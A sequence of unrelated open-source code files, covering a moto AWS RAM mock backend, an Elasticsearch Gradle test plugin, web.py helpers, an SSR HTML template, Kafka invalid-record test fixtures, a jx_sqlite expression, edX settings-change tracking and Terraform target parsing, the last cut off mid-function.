raise MalformedArnException(
"The specified resource ARN {} is not valid. "
"Verify the ARN and try again.".format(resource)
)
if match.group(1) not in self.SHAREABLE_RESOURCES:
raise MalformedArnException(
"You cannot share the selected resource type."
)
for resource in resource_arns:
self.resource_arns.append(resource)
def delete(self):
self.last_updated_time = datetime.utcnow()
self.status = "DELETED"
def describe(self):
return {
"allowExternalPrincipals": self.allow_external_principals,
"creationTime": unix_time(self.creation_time),
"featureSet": self.feature_set,
"lastUpdatedTime": unix_time(self.last_updated_time),
"name": self.name,
"owningAccountId": self.owning_account_id,
"resourceShareArn": self.arn,
"status": self.status,
}
def update(self, **kwargs):
self.allow_external_principals = kwargs.get(
"allowExternalPrincipals", self.allow_external_principals
)
self.last_updated_time = datetime.utcnow()
self.name = kwargs.get("name", self.name)
class ResourceAccessManagerBackend(BaseBackend):
def __init__(self, region_name=None):
super(ResourceAccessManagerBackend, self).__init__()
self.region_name = region_name
self.resource_shares = []
@property
def organizations_backend(self):
return organizations_backends["global"]
def reset(self):
region_name = self.region_name
self.__dict__ = {}
self.__init__(region_name)
def create_resource_share(self, **kwargs):
resource = ResourceShare(self.region_name, **kwargs)
resource.add_principals(kwargs.get("principals", []))
resource.add_resources(kwargs.get("resourceArns", []))
self.resource_shares.append(resource)
response = resource.describe()
response.pop("featureSet")
return dict(resourceShare=response)
def get_resource_shares(self, **kwargs):
owner = kwargs["resourceOwner"]
if owner not in ["SELF", "OTHER-ACCOUNTS"]:
raise InvalidParameterException(
"{} is not a valid resource owner. "
"Specify either SELF or OTHER-ACCOUNTS and try again.".format(owner)
)
if owner == "OTHER-ACCOUNTS":
raise NotImplementedError(
"Value 'OTHER-ACCOUNTS' for parameter 'resourceOwner' not implemented."
)
resouces = [resource.describe() for resource in self.resource_shares]
return dict(resourceShares=resouces)
def update_resource_share(self, **kwargs):
arn = kwargs["resourceShareArn"]
resource = next(
(resource for resource in self.resource_shares if arn == resource.arn),
None,
)
if not resource:
raise UnknownResourceException(
"ResourceShare {} could not be found.".format(arn)
)
resource.update(**kwargs)
response = resource.describe()
response.pop("featureSet")
return dict(resourceShare=response)
def delete_resource_share(self, arn):
resource = next(
(resource for resource in self.resource_shares if arn == resource.arn),
None,
)
if not resource:
raise UnknownResourceException(
"ResourceShare {} could not be found.".format(arn)
)
resource.delete()
return dict(returnValue=True)
def enable_sharing_with_aws_organization(self):
if not self.organizations_backend.org:
raise OperationNotPermittedException
return dict(returnValue=True)
ram_backends = {}
for region in Session().get_available_regions("ram"):
ram_backends[region] = ResourceAccessManagerBackend(region)
for region in Session().get_available_regions("ram", partition_name="aws-us-gov"):
ram_backends[region] = ResourceAccessManagerBackend(region)
for region in Session().get_available_regions("ram", partition_name="aws-cn"):
ram_backends[region] = ResourceAccessManagerBackend(region)
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the "Elastic License
* 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side
* Public License v 1"; you may not use this file except in compliance with, at
* your election, the "Elastic License 2.0", the "GNU Affero General Public
* License v3.0 only", or the "Server Side Public License, v 1".
*/
package org.elasticsearch.gradle.internal.test;
import org.elasticsearch.gradle.internal.ElasticsearchJavaBasePlugin;
import org.elasticsearch.gradle.internal.ElasticsearchTestBasePlugin;
import org.elasticsearch.gradle.internal.FixtureStop;
import org.elasticsearch.gradle.internal.InternalTestClustersPlugin;
import org.elasticsearch.gradle.internal.RestrictedBuildApiService;
import org.elasticsearch.gradle.internal.precommit.InternalPrecommitTasks;
import org.elasticsearch.gradle.test.SystemPropertyCommandLineArgumentProvider;
import org.elasticsearch.gradle.testclusters.ElasticsearchCluster;
import org.elasticsearch.gradle.testclusters.StandaloneRestIntegTestTask;
import org.elasticsearch.gradle.testclusters.TestClustersPlugin;
import org.elasticsearch.gradle.util.GradleUtils;
import org.gradle.api.NamedDomainObjectContainer;
import org.gradle.api.Plugin;
import org.gradle.api.Project;
import org.gradle.api.Task;
import org.gradle.api.plugins.JavaBasePlugin;
import org.gradle.api.provider.Provider;
import org.gradle.api.provider.ProviderFactory;
import org.gradle.api.specs.NotSpec;
import org.gradle.api.specs.Spec;
import org.gradle.api.tasks.Sync;
import org.gradle.api.tasks.bundling.Zip;
import javax.inject.Inject;
import static org.elasticsearch.gradle.internal.RestrictedBuildApiService.BUILD_API_RESTRICTIONS_SYS_PROPERTY;
import static org.elasticsearch.gradle.plugin.BasePluginBuildPlugin.BUNDLE_PLUGIN_TASK_NAME;
import static org.elasticsearch.gradle.plugin.BasePluginBuildPlugin.EXPLODED_BUNDLE_PLUGIN_TASK_NAME;
/**
* @deprecated use {@link RestTestBasePlugin} instead
*/
@Deprecated
public class LegacyRestTestBasePlugin implements Plugin<Project> {
private static final String TESTS_REST_CLUSTER = "tests.rest.cluster";
private static final String TESTS_CLUSTER = "tests.cluster";
private static final String TESTS_CLUSTER_NAME = "tests.clustername";
private static final String TESTS_CLUSTER_READINESS = "tests.cluster.readiness";
private static final String TESTS_CLUSTER_REMOTE_ACCESS = "tests.cluster.remote_access";
private ProviderFactory providerFactory;
private Project project;
@Inject
public LegacyRestTestBasePlugin(ProviderFactory providerFactory) {
this.providerFactory = providerFactory;
}
@Override
public void apply(Project project) {
this.project = project;
Provider<RestrictedBuildApiService> serviceProvider = project.getGradle()
.getSharedServices()
.registerIfAbsent("restrictedBuildAPI", RestrictedBuildApiService.class, spec -> {
spec.getParameters().getDisabled().set(Boolean.getBoolean(BUILD_API_RESTRICTIONS_SYS_PROPERTY));
});
serviceProvider.get().failOnUsageRestriction(getClass(), project);
project.getPluginManager().apply(ElasticsearchJavaBasePlugin.class);
project.getPluginManager().apply(ElasticsearchTestBasePlugin.class);
project.getPluginManager().apply(InternalTestClustersPlugin.class);
InternalPrecommitTasks.create(project, false);
project.getTasks().withType(RestIntegTestTask.class).configureEach(restIntegTestTask -> {
@SuppressWarnings("unchecked")
NamedDomainObjectContainer<ElasticsearchCluster> testClusters = (NamedDomainObjectContainer<ElasticsearchCluster>) project
.getExtensions()
.getByName(TestClustersPlugin.EXTENSION_NAME);
ElasticsearchCluster cluster = testClusters.maybeCreate(restIntegTestTask.getName());
restIntegTestTask.useCluster(cluster);
restIntegTestTask.include("**/*IT.class");
restIntegTestTask.systemProperty("tests.rest.load_packaged", Boolean.FALSE.toString());
if (systemProperty(TESTS_REST_CLUSTER) == null) {
if (systemProperty(TESTS_CLUSTER) != null || systemProperty(TESTS_CLUSTER_NAME) != null) {
throw new IllegalArgumentException(
String.format("%s, %s, and %s must all be null or non-null", TESTS_REST_CLUSTER, TESTS_CLUSTER, TESTS_CLUSTER_NAME)
);
}
SystemPropertyCommandLineArgumentProvider runnerNonInputProperties =
(SystemPropertyCommandLineArgumentProvider) restIntegTestTask.getExtensions().getByName("nonInputProperties");
runnerNonInputProperties.systemProperty(TESTS_REST_CLUSTER, () -> String.join(",", cluster.getAllHttpSocketURI()));
runnerNonInputProperties.systemProperty(TESTS_CLUSTER, () -> String.join(",", cluster.getAllTransportPortURI()));
runnerNonInputProperties.systemProperty(TESTS_CLUSTER_NAME, cluster::getName);
runnerNonInputProperties.systemProperty(TESTS_CLUSTER_READINESS, () -> String.join(",", cluster.getAllReadinessPortURI()));
runnerNonInputProperties.systemProperty(
TESTS_CLUSTER_REMOTE_ACCESS,
() -> String.join(",", cluster.getAllRemoteAccessPortURI())
);
} else {
if (systemProperty(TESTS_CLUSTER) == null || systemProperty(TESTS_CLUSTER_NAME) == null) {
throw new IllegalArgumentException(
String.format("%s, %s, and %s must all be null or non-null", TESTS_REST_CLUSTER, TESTS_CLUSTER, TESTS_CLUSTER_NAME)
);
}
}
});
project.getTasks()
.named(JavaBasePlugin.CHECK_TASK_NAME)
.configure(check -> check.dependsOn(project.getTasks().withType(RestIntegTestTask.class)));
project.getTasks()
.withType(StandaloneRestIntegTestTask.class)
.configureEach(t -> t.finalizedBy(project.getTasks().withType(FixtureStop.class)));
project.getTasks().withType(StandaloneRestIntegTestTask.class).configureEach(t -> {
t.setMaxParallelForks(1);
// if this a module or plugin, it may have an associated zip file with it's contents, add that to the test cluster
project.getPluginManager().withPlugin("elasticsearch.esplugin", plugin -> {
if (GradleUtils.isModuleProject(project.getPath())) {
var bundle = project.getTasks().withType(Sync.class).named(EXPLODED_BUNDLE_PLUGIN_TASK_NAME);
t.getClusters().forEach(c -> c.module(bundle));
} else {
var bundle = project.getTasks().withType(Zip.class).named(BUNDLE_PLUGIN_TASK_NAME);
t.getClusters().forEach(c -> c.plugin(bundle));
}
});
configureCacheability(t);
});
}
private void configureCacheability(StandaloneRestIntegTestTask testTask) {
Spec<Task> taskSpec = task -> testTask.getClusters().stream().anyMatch(ElasticsearchCluster::isShared);
testTask.getOutputs()
.doNotCacheIf(
"Caching disabled for this task since it uses a cluster shared by other tasks",
/*
* Look for any other tasks which use the same cluster as this task. Since tests often have side effects for the cluster
* they execute against, this state can cause issues when trying to cache tests results of tasks that share a cluster. To
* avoid any undesired behavior we simply disable the cache if we detect that this task uses a cluster shared between
* multiple tasks.
*/
taskSpec
);
testTask.getOutputs().upToDateWhen(new NotSpec(taskSpec));
}
private String systemProperty(String propName) {
return providerFactory.systemProperty(propName).getOrNull();
}
}
|
java
|
github
|
https://github.com/elastic/elasticsearch
|
build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/LegacyRestTestBasePlugin.java
|
# -*- coding: utf-8 -*-
import base64
import web
import gecoc.gecolib as gecolib
def authenticated(function):
session = web.ses
def new_function(*args, **kwargs):
username = session.get('username', '')
if username:
return function(*args, **kwargs)
else:
raise web.seeother('/login')
return new_function
def error(function):
def new_function(*args, **kwargs):
try:
return function(*args, **kwargs)
except Exception, e:
if type(e) == type(web.seeother('')):
raise
else:
try:
flash(e.faultString, 'error')
except:
flash(str(e), 'error')
raise web.seeother('/error')
return new_function
def templated(css='', js='', title='', menu=[]):
css = css.split(' ') if css else []
js = js.split(' ') if js else []
render = web.template.render('templates')
def new_deco(function):
def new_function(*args, **kwargs):
e = get_err()
m = get_msg()
body = function(*args, **kwargs)
templated = render.master(title=title, css=css,
js=js, body=body, errors=e, msgs=m, menu=menu)
return templated
return new_function
return new_deco
def flash(msg, t='msg'):
'''
t could be msg or error
'''
enc = base64.b64encode
session = web.ses
if t == 'msg':
if type(msg) == type([]):
session.msgs = map(enc, msg)
else:
session.msgs = [enc(str(msg))]
else:
if type(msg) == type([]):
session.errors = map(enc, msg)
else:
session.errors = [enc(str(msg))]
def get_msg():
dec = base64.b64decode
session = web.ses
m = session.pop('msgs', '')
return map(dec, m)
def get_err():
dec = base64.b64decode
session = web.ses
e = session.pop('errors', '')
return map(dec, e)
def get_gso(**params):
server = web.SERVER
if server.startswith('http://'):
ssl = False
server = server[7:]
elif server.startswith('https://'):
ssl = True
server = server[8:]
base = server.split('/')[0]
path = '/'.join(server.split('/')[1:])
gso = gecolib.GSO("json", name=server, base=base, path=path, ssl=ssl, **params)
return gso
|
unknown
|
codeparrot/codeparrot-clean
| ||
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>React Router - SSR Example</title>
</head>
<body>
<div id="app"><!--app-html--></div>
<script type="module" src="/src/entry.client.tsx"></script>
</body>
</html>
|
html
|
github
|
https://github.com/remix-run/react-router
|
examples/ssr/index.html
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.kafka.common.record.internal;
import org.apache.kafka.common.errors.CorruptRecordException;
import org.junit.jupiter.api.extension.ExtensionContext;
import org.junit.jupiter.params.provider.Arguments;
import org.junit.jupiter.params.provider.ArgumentsProvider;
import java.nio.ByteBuffer;
import java.util.Optional;
import java.util.stream.Stream;
public final class InvalidMemoryRecordsProvider implements ArgumentsProvider {
// Use a baseOffset that's not zero so that it is less likely to match the LEO
private static final long BASE_OFFSET = 1234;
private static final int EPOCH = 4321;
/**
* Returns a stream of arguments for invalid memory records and the expected exception.
*
* The first object in the {@code Arguments} is a {@code MemoryRecords}.
*
* The second object in the {@code Arguments} is an {@code Optional<Class<Exception>>} which is
* the expected exception from the log layer.
*/
@Override
public Stream<? extends Arguments> provideArguments(ExtensionContext context) {
return Stream.of(
Arguments.of(MemoryRecords.readableRecords(notEnoughBytes()), Optional.empty()),
Arguments.of(MemoryRecords.readableRecords(recordsSizeTooSmall()), Optional.of(CorruptRecordException.class)),
Arguments.of(MemoryRecords.readableRecords(notEnoughBytesToMagic()), Optional.empty()),
Arguments.of(MemoryRecords.readableRecords(negativeMagic()), Optional.of(CorruptRecordException.class)),
Arguments.of(MemoryRecords.readableRecords(largeMagic()), Optional.of(CorruptRecordException.class)),
Arguments.of(MemoryRecords.readableRecords(lessBytesThanRecordSize()), Optional.empty())
);
}
private static ByteBuffer notEnoughBytes() {
var buffer = ByteBuffer.allocate(Records.LOG_OVERHEAD - 1);
buffer.limit(buffer.capacity());
return buffer;
}
private static ByteBuffer recordsSizeTooSmall() {
var buffer = ByteBuffer.allocate(256);
// Write the base offset
buffer.putLong(BASE_OFFSET);
// Write record size
buffer.putInt(LegacyRecord.RECORD_OVERHEAD_V0 - 1);
buffer.position(0);
buffer.limit(buffer.capacity());
return buffer;
}
private static ByteBuffer notEnoughBytesToMagic() {
var buffer = ByteBuffer.allocate(256);
// Write the base offset
buffer.putLong(BASE_OFFSET);
// Write record size
buffer.putInt(buffer.capacity() - Records.LOG_OVERHEAD);
buffer.position(0);
buffer.limit(Records.HEADER_SIZE_UP_TO_MAGIC - 1);
return buffer;
}
private static ByteBuffer negativeMagic() {
var buffer = ByteBuffer.allocate(256);
// Write the base offset
buffer.putLong(BASE_OFFSET);
// Write record size
buffer.putInt(buffer.capacity() - Records.LOG_OVERHEAD);
// Write the epoch
buffer.putInt(EPOCH);
// Write magic
buffer.put((byte) -1);
buffer.position(0);
buffer.limit(buffer.capacity());
return buffer;
}
private static ByteBuffer largeMagic() {
var buffer = ByteBuffer.allocate(256);
// Write the base offset
buffer.putLong(BASE_OFFSET);
// Write record size
buffer.putInt(buffer.capacity() - Records.LOG_OVERHEAD);
// Write the epoch
buffer.putInt(EPOCH);
// Write magic
buffer.put((byte) (RecordBatch.CURRENT_MAGIC_VALUE + 1));
buffer.position(0);
buffer.limit(buffer.capacity());
return buffer;
}
private static ByteBuffer lessBytesThanRecordSize() {
var buffer = ByteBuffer.allocate(256);
// Write the base offset
buffer.putLong(BASE_OFFSET);
// Write record size
buffer.putInt(buffer.capacity() - Records.LOG_OVERHEAD);
// Write the epoch
buffer.putInt(EPOCH);
// Write magic
buffer.put(RecordBatch.CURRENT_MAGIC_VALUE);
buffer.position(0);
buffer.limit(buffer.capacity() - Records.LOG_OVERHEAD - 1);
return buffer;
}
}
|
java
|
github
|
https://github.com/apache/kafka
|
clients/src/test/java/org/apache/kafka/common/record/internal/InvalidMemoryRecordsProvider.java
|
# encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http:# mozilla.org/MPL/2.0/.
#
# Contact: Kyle Lahnakoski (kyle@lahnakoski.com)
#
from __future__ import absolute_import, division, unicode_literals
from jx_base.expressions import PrefixOp as PrefixOp_
from jx_sqlite.expressions._utils import check, SQLang
from jx_sqlite.sqlite import sql_call
from mo_dots import wrap
from mo_sql import SQL_TRUE, ConcatSQL, SQL_EQ, SQL_ONE
class PrefixOp(PrefixOp_):
@check
def to_sql(self, schema, not_null=False, boolean=False):
if not self.expr:
return wrap([{"name": ".", "sql": {"b": SQL_TRUE}}])
else:
sql = ConcatSQL(
sql_call(
"INSTR",
SQLang[self.expr].to_sql(schema)[0].sql.s,
SQLang[self.prefix].to_sql(schema)[0].sql.s,
),
SQL_EQ,
SQL_ONE,
)
return wrap([{"name": ".", "sql": {"b": sql}}])
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""
Utilities for django models.
"""
import unicodedata
import re
from eventtracking import tracker
from django.conf import settings
from django.utils.encoding import force_unicode
from django.utils.safestring import mark_safe
from django_countries.fields import Country
# The setting name used for events when "settings" (account settings, preferences, profile information) change.
USER_SETTINGS_CHANGED_EVENT_NAME = u'edx.user.settings.changed'
def get_changed_fields_dict(instance, model_class):
"""
Helper method for tracking field changes on a model.
Given a model instance and class, return a dict whose keys are that
instance's fields which differ from the last saved ones and whose values
are the old values of those fields. Related fields are not considered.
Args:
instance (Model instance): the model instance with changes that are
being tracked
model_class (Model class): the class of the model instance we are
tracking
Returns:
dict: a mapping of field names to current database values of those
fields, or an empty dict if the model is new
"""
try:
old_model = model_class.objects.get(pk=instance.pk)
except model_class.DoesNotExist:
# Object is new, so fields haven't technically changed. We'll return
# an empty dict as a default value.
return {}
else:
field_names = [
field[0].name for field in model_class._meta.get_fields_with_model()
]
changed_fields = {
field_name: getattr(old_model, field_name) for field_name in field_names
if getattr(old_model, field_name) != getattr(instance, field_name)
}
return changed_fields
def emit_field_changed_events(instance, user, db_table, excluded_fields=None, hidden_fields=None):
"""Emits a settings changed event for each field that has changed.
Note that this function expects that a `_changed_fields` dict has been set
as an attribute on `instance` (see `get_changed_fields_dict`.
Args:
instance (Model instance): the model instance that is being saved
user (User): the user that this instance is associated with
db_table (str): the name of the table that we're modifying
excluded_fields (list): a list of field names for which events should
not be emitted
hidden_fields (list): a list of field names specifying fields whose
values should not be included in the event (None will be used
instead)
Returns:
None
"""
def clean_field(field_name, value):
"""
Prepare a field to be emitted in a JSON serializable format. If
`field_name` is a hidden field, return None.
"""
if field_name in hidden_fields:
return None
# Country is not JSON serializable. Return the country code.
if isinstance(value, Country):
if value.code:
return value.code
else:
return None
return value
excluded_fields = excluded_fields or []
hidden_fields = hidden_fields or []
changed_fields = getattr(instance, '_changed_fields', {})
for field_name in changed_fields:
if field_name not in excluded_fields:
old_value = clean_field(field_name, changed_fields[field_name])
new_value = clean_field(field_name, getattr(instance, field_name))
emit_setting_changed_event(user, db_table, field_name, old_value, new_value)
# Remove the now inaccurate _changed_fields attribute.
if hasattr(instance, '_changed_fields'):
del instance._changed_fields
def truncate_fields(old_value, new_value):
"""
Truncates old_value and new_value for analytics event emission if necessary.
Args:
old_value(obj): the value before the change
new_value(obj): the new value being saved
Returns:
a dictionary with the following fields:
'old': the truncated old value
'new': the truncated new value
'truncated': the list of fields that have been truncated
"""
# Compute the maximum value length so that two copies can fit into the maximum event size
# in addition to all the other fields recorded.
max_value_length = settings.TRACK_MAX_EVENT / 4
serialized_old_value, old_was_truncated = _get_truncated_setting_value(old_value, max_length=max_value_length)
serialized_new_value, new_was_truncated = _get_truncated_setting_value(new_value, max_length=max_value_length)
truncated_values = []
if old_was_truncated:
truncated_values.append("old")
if new_was_truncated:
truncated_values.append("new")
return {'old': serialized_old_value, 'new': serialized_new_value, 'truncated': truncated_values}
def emit_setting_changed_event(user, db_table, setting_name, old_value, new_value):
"""Emits an event for a change in a setting.
Args:
user (User): the user that this setting is associated with.
db_table (str): the name of the table that we're modifying.
setting_name (str): the name of the setting being changed.
old_value (object): the value before the change.
new_value (object): the new value being saved.
Returns:
None
"""
truncated_fields = truncate_fields(old_value, new_value)
truncated_fields['setting'] = setting_name
truncated_fields['user_id'] = user.id
truncated_fields['table'] = db_table
tracker.emit(
USER_SETTINGS_CHANGED_EVENT_NAME,
truncated_fields
)
def _get_truncated_setting_value(value, max_length=None):
"""
Returns the truncated form of a setting value.
Returns:
truncated_value (object): the possibly truncated version of the value.
was_truncated (bool): returns true if the serialized value was truncated.
"""
if isinstance(value, basestring) and max_length is not None and len(value) > max_length:
return value[0:max_length], True
else:
return value, False
# Taken from Django 1.8 source code because it's not supported in 1.4
def slugify(value):
"""Converts value into a string suitable for readable URLs.
Converts to ASCII. Converts spaces to hyphens. Removes characters that
aren't alphanumerics, underscores, or hyphens. Converts to lowercase.
Also strips leading and trailing whitespace.
Args:
value (string): String to slugify.
"""
value = force_unicode(value)
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore').decode('ascii')
value = re.sub(r'[^\w\s-]', '', value).strip().lower()
return mark_safe(re.sub(r'[-\s]+', '-', value))
|
unknown
|
codeparrot/codeparrot-clean
| ||
// Copyright (c) HashiCorp, Inc.
// SPDX-License-Identifier: BUSL-1.1
package addrs
import (
"fmt"
"github.com/hashicorp/hcl/v2"
"github.com/hashicorp/hcl/v2/hclsyntax"
"github.com/hashicorp/terraform/internal/tfdiags"
)
// Target describes a targeted address with source location information.
type Target struct {
Subject Targetable
SourceRange tfdiags.SourceRange
}
// ParseTarget attempts to interpret the given traversal as a targetable
// address. The given traversal must be absolute, or this function will
// panic.
//
// If no error diagnostics are returned, the returned target includes the
// address that was extracted and the source range it was extracted from.
//
// If error diagnostics are returned then the Target value is invalid and
// must not be used.
func ParseTarget(traversal hcl.Traversal) (*Target, tfdiags.Diagnostics) {
return parseTarget(traversal, false)
}
// ParsePartialTarget is like ParseTarget, but it allows the given traversal
// to support the [*] wildcard syntax for resource instances. These indicate
// a "partial" resource address that refers to all potential instances of a
// resource or module.
func ParsePartialTarget(traversal hcl.Traversal) (*Target, tfdiags.Diagnostics) {
return parseTarget(traversal, true)
}
func parseTarget(traversal hcl.Traversal, allowPartial bool) (*Target, tfdiags.Diagnostics) {
path, remain, diags := parseModuleInstancePrefix(traversal, allowPartial)
if diags.HasErrors() {
return nil, diags
}
rng := tfdiags.SourceRangeFromHCL(traversal.SourceRange())
if len(remain) == 0 {
return &Target{
Subject: path,
SourceRange: rng,
}, diags
}
riAddr, moreDiags := parseResourceInstanceUnderModule(path, allowPartial, remain)
diags = diags.Append(moreDiags)
if diags.HasErrors() {
return nil, diags
}
var subject Targetable
switch {
case riAddr.Resource.Key == NoKey:
// We always assume that a no-key instance is meant to
// be referring to the whole resource, because the distinction
// doesn't really matter for targets anyway.
subject = riAddr.ContainingResource()
default:
subject = riAddr
}
return &Target{
Subject: subject,
SourceRange: rng,
}, diags
}
// parseConfigResourceUnderModule attempts to parse the given traversal as the
// address for a ConfigResource in the context of the given module.
//
// Error diagnostics are returned if the resource address contains an instance
// key.
func parseConfigResourceUnderModule(moduleAddr Module, remain hcl.Traversal) (ConfigResource, tfdiags.Diagnostics) {
var diags tfdiags.Diagnostics
mode := ManagedResourceMode
if remain.RootName() == "data" {
mode = DataResourceMode
remain = remain[1:]
}
if len(remain) < 2 {
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: "Resource specification must include a resource type and name.",
Subject: remain.SourceRange().Ptr(),
})
return ConfigResource{}, diags
}
var typeName, name string
switch tt := remain[0].(type) {
case hcl.TraverseRoot:
typeName = tt.Name
case hcl.TraverseAttr:
typeName = tt.Name
default:
switch mode {
case ManagedResourceMode:
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: "A resource type name is required.",
Subject: remain[0].SourceRange().Ptr(),
})
case DataResourceMode:
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: "A data source name is required.",
Subject: remain[0].SourceRange().Ptr(),
})
default:
panic("unknown mode")
}
return ConfigResource{}, diags
}
switch tt := remain[1].(type) {
case hcl.TraverseAttr:
name = tt.Name
default:
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: "A resource name is required.",
Subject: remain[1].SourceRange().Ptr(),
})
return ConfigResource{}, diags
}
remain = remain[2:]
if len(remain) > 0 {
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Resource instance keys not allowed",
Detail: "Resource address must be a resource (e.g. \"test_instance.foo\"), not a resource instance (e.g. \"test_instance.foo[1]\").",
Subject: remain[0].SourceRange().Ptr(),
})
return ConfigResource{}, diags
}
return ConfigResource{
Module: moduleAddr,
Resource: Resource{
Mode: mode,
Type: typeName,
Name: name,
},
}, diags
}
func parseResourceInstanceUnderModule(moduleAddr ModuleInstance, allowPartial bool, remain hcl.Traversal) (AbsResourceInstance, tfdiags.Diagnostics) {
// Note that this helper is used as part of both ParseTarget and
// ParseMoveEndpoint, so its error messages should be generic
// enough to suit both situations.
var diags tfdiags.Diagnostics
mode := ManagedResourceMode
switch remain.RootName() {
case "data":
mode = DataResourceMode
remain = remain[1:]
case "ephemeral":
mode = EphemeralResourceMode
remain = remain[1:]
case "list":
mode = ListResourceMode
remain = remain[1:]
case "resource":
// Starting a resource address with "resource" is optional, so we'll
// just ignore it.
remain = remain[1:]
case "count", "each", "local", "module", "path", "self", "terraform", "var", "template", "lazy", "arg":
// These are all reserved words that are not valid as resource types.
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: fmt.Sprintf("The keyword %q is reserved and cannot be used to target a resource address. If you are targeting a resource type that uses a reserved keyword, please prefix your address with \"resource.\".", remain.RootName()),
Subject: remain.SourceRange().Ptr(),
})
return AbsResourceInstance{}, diags
}
if len(remain) < 2 {
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: "Resource specification must include a resource type and name.",
Subject: remain.SourceRange().Ptr(),
})
return AbsResourceInstance{}, diags
}
var typeName, name string
switch tt := remain[0].(type) {
case hcl.TraverseRoot:
typeName = tt.Name
case hcl.TraverseAttr:
typeName = tt.Name
default:
switch mode {
case ManagedResourceMode:
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: "A resource type name is required.",
Subject: remain[0].SourceRange().Ptr(),
})
case DataResourceMode:
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: "A data source name is required.",
Subject: remain[0].SourceRange().Ptr(),
})
case EphemeralResourceMode:
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: "An ephemeral resource type name is required.",
Subject: remain[0].SourceRange().Ptr(),
})
case ListResourceMode:
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: "A list resource type name is required.",
Subject: remain[0].SourceRange().Ptr(),
})
default:
panic("unknown mode")
}
return AbsResourceInstance{}, diags
}
switch tt := remain[1].(type) {
case hcl.TraverseAttr:
name = tt.Name
default:
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: "A resource name is required.",
Subject: remain[1].SourceRange().Ptr(),
})
return AbsResourceInstance{}, diags
}
remain = remain[2:]
switch len(remain) {
case 0:
return moduleAddr.ResourceInstance(mode, typeName, name, NoKey), diags
case 1:
switch tt := remain[0].(type) {
case hcl.TraverseIndex:
key, err := ParseInstanceKey(tt.Key)
if err != nil {
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: fmt.Sprintf("Invalid resource instance key: %s.", err),
Subject: remain[0].SourceRange().Ptr(),
})
return AbsResourceInstance{}, diags
}
return moduleAddr.ResourceInstance(mode, typeName, name, key), diags
case hcl.TraverseSplat:
if allowPartial {
return moduleAddr.ResourceInstance(mode, typeName, name, WildcardKey), diags
}
// Otherwise, return an error.
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: "Resource instance key must be given in square brackets.",
Subject: remain[0].SourceRange().Ptr(),
})
return AbsResourceInstance{}, diags
default:
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: "Resource instance key must be given in square brackets.",
Subject: remain[0].SourceRange().Ptr(),
})
return AbsResourceInstance{}, diags
}
default:
diags = diags.Append(&hcl.Diagnostic{
Severity: hcl.DiagError,
Summary: "Invalid address",
Detail: "Unexpected extra operators after address.",
Subject: remain[1].SourceRange().Ptr(),
})
return AbsResourceInstance{}, diags
}
}
// ParseTargetStr is a helper wrapper around ParseTarget that takes a string
// and parses it with the HCL native syntax traversal parser before
// interpreting it.
//
// This should be used only in specialized situations since it will cause the
// created references to not have any meaningful source location information.
// If a target string is coming from a source that should be identified in
// error messages then the caller should instead parse it directly using a
// suitable function from the HCL API and pass the traversal itself to
// ParseTarget.
//
// Error diagnostics are returned if either the parsing fails or the analysis
// of the traversal fails. There is no way for the caller to distinguish the
// two kinds of diagnostics programmatically. If error diagnostics are returned
// the returned target may be nil or incomplete.
func ParseTargetStr(str string) (*Target, tfdiags.Diagnostics) {
var diags tfdiags.Diagnostics
traversal, parseDiags := hclsyntax.ParseTraversalAbs([]byte(str), "", hcl.Pos{Line: 1, Column: 1})
diags = diags.Append(parseDiags)
if parseDiags.HasErrors() {
return nil, diags
}
target, targetDiags := ParseTarget(traversal)
diags = diags.Append(targetDiags)
return target, diags
}
// ParseAbsResource attempts to interpret the given traversal as an absolute
// resource address, using the same syntax as expected by ParseTarget.
//
// If no error diagnostics are returned, the returned target includes the
// address that was extracted and the source range it was extracted from.
//
// If error diagnostics are returned then the AbsResource value is invalid and
// must not be used.
func ParseAbsResource(traversal hcl.Traversal) (AbsResource, tfdiags.Diagnostics) {
addr, diags := ParseTarget(traversal)
if diags.HasErrors() {
return AbsResource{}, diags
}
